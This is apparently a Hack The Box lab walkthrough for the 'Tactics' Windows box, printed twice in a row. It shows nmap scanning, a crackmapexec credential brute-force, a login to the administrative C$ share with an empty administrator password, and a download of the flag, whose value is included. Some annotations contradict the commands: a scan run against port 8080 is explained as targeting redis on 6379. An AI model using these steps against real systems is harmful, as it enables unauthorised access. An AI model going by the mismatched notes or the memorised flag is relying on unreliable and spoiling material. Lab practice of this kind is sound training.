10.TACTICS (SMB)

Protocols, SMB, Reconnaissance, Misconfiguration

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp open  msrpc         Microsoft Windows RPC
 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds?
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445
 PORT   STATE SERVICE VERSION
 135/tcp open  msrpc         Microsoft Windows RPC
 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds?
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 | smb2-time: 
 |   date: 2025-03-04T02:57:55
 |_  start_date: N/A

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
 PORT   STATE SERVICE
 135/tcp open  msrpc
 139/tcp open  netbios-ssn
 445/tcp open  microsoft-ds

 Host script results:
 |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
 |_smb-vuln-ms10-054: false
 |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#this test whether the server have password misconfiguration

root@htb:~$ smbclient -h
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\

 * the -N refers to "no password"
 * the -L is used to list available shares on the target

root@htb:~$ smbclient -L {targetIP} -U {administrator}
 Password for [WORKGROUP\administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
 Reconnecting with SMB1 for workgroup listing.
 do_connect: Connection to 10.129.95.200 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
 Unable to connect with SMB1 -- no workgroup available

 * the -L flag is used to list available shares on the target.
 * the -U flag is used to specify the Login identity to use.
    - misconfigured smb servers typically have administrator as the username
      with an unset password
 * the $ symbol at the end of the sharename means that it is an administrative share
      
 * ALT: use crackmapexec to brute force credentials
 
    crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p ""
    SMB         10.129.95.200   445    TACTICS          [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
    SMB         10.129.95.200   445    TACTICS          [-] Tactics\user: STATUS_LOGON_FAILURE 
    SMB         10.129.95.200   445    TACTICS          [+] Tactics\administrator: (Pwn3d!)

root@htb:~$ smbclient \\\\10.129.95.200\\ADMIN$ -U Administrator
smbclient \\\\10.129.95.200\\ADMIN$ -U Administrator
 Password for [WORKGROUP\Administrator]:
 Try "help" to get a list of possible commands.
smb: \> help
 ...
 
root@htb:~$ smbclient \\\\10.129.95.200\\C$ -U Administrator
 Password for [WORKGROUP\Administrator]:
 Try "help" to get a list of possible commands.
smb: \> help
 ...

smb: \> dir
 Users                              DR        0  Wed Apr 21 10:23:18 2021

smb: \> dir Users\
 Administrator                       D        0  Wed Apr 21 10:23:32 2021

smb: \> dir Users\Administrator\Desktop\
 flag.txt                            A       32  Fri Apr 23 04:39:00 2021

smb: \> get Users\Administrator\Desktop\flag.txt
 getting file \Users\Administrator\Desktop\flag.txt of size 32 as Users\Administrator\Desktop\flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

root@htb:~$ cat Users\\Administrator\\Desktop\\flag.txt 
 f751c19eda8f61ce81827e6930a1f40c

Previous09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)NextTIER 2

Last updated 1 month ago

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp open  msrpc         Microsoft Windows RPC
 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds?
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 135,139,445
 PORT   STATE SERVICE VERSION
 135/tcp open  msrpc         Microsoft Windows RPC
 139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp open  microsoft-ds?
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 | smb2-time: 
 |   date: 2025-03-04T02:57:55
 |_  start_date: N/A

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
 PORT   STATE SERVICE
 135/tcp open  msrpc
 139/tcp open  netbios-ssn
 445/tcp open  microsoft-ds

 Host script results:
 |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
 |_smb-vuln-ms10-054: false
 |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#this test whether the server have password misconfiguration

root@htb:~$ smbclient -h
root@htb:~$ smbclient -N -L \\\\{TARGET_IP}\\

 * the -N refers to "no password"
 * the -L is used to list available shares on the target

root@htb:~$ smbclient -L {targetIP} -U {administrator}
 Password for [WORKGROUP\administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
 Reconnecting with SMB1 for workgroup listing.
 do_connect: Connection to 10.129.95.200 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
 Unable to connect with SMB1 -- no workgroup available

 * the -L flag is used to list available shares on the target.
 * the -U flag is used to specify the Login identity to use.
    - misconfigured smb servers typically have administrator as the username
      with an unset password
 * the $ symbol at the end of the sharename means that it is an administrative share
      
 * ALT: use crackmapexec to brute force credentials
 
    crackmapexec smb 10.129.95.200 -u top-usernames-shortlist.txt -p ""
    SMB         10.129.95.200   445    TACTICS          [*] Windows 10 / Server 2019 Build 17763 x64 (name:TACTICS) (domain:Tactics) (signing:False) (SMBv1:False)
    SMB         10.129.95.200   445    TACTICS          [-] Tactics\user: STATUS_LOGON_FAILURE 
    SMB         10.129.95.200   445    TACTICS          [+] Tactics\administrator: (Pwn3d!)

root@htb:~$ smbclient \\\\10.129.95.200\\ADMIN$ -U Administrator
smbclient \\\\10.129.95.200\\ADMIN$ -U Administrator
 Password for [WORKGROUP\Administrator]:
 Try "help" to get a list of possible commands.
smb: \> help
 ...
 
root@htb:~$ smbclient \\\\10.129.95.200\\C$ -U Administrator
 Password for [WORKGROUP\Administrator]:
 Try "help" to get a list of possible commands.
smb: \> help
 ...

smb: \> dir
 Users                              DR        0  Wed Apr 21 10:23:18 2021

smb: \> dir Users\
 Administrator                       D        0  Wed Apr 21 10:23:32 2021

smb: \> dir Users\Administrator\Desktop\
 flag.txt                            A       32  Fri Apr 23 04:39:00 2021

smb: \> get Users\Administrator\Desktop\flag.txt
 getting file \Users\Administrator\Desktop\flag.txt of size 32 as Users\Administrator\Desktop\flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

root@htb:~$ cat Users\\Administrator\\Desktop\\flag.txt 
 f751c19eda8f61ce81827e6930a1f40c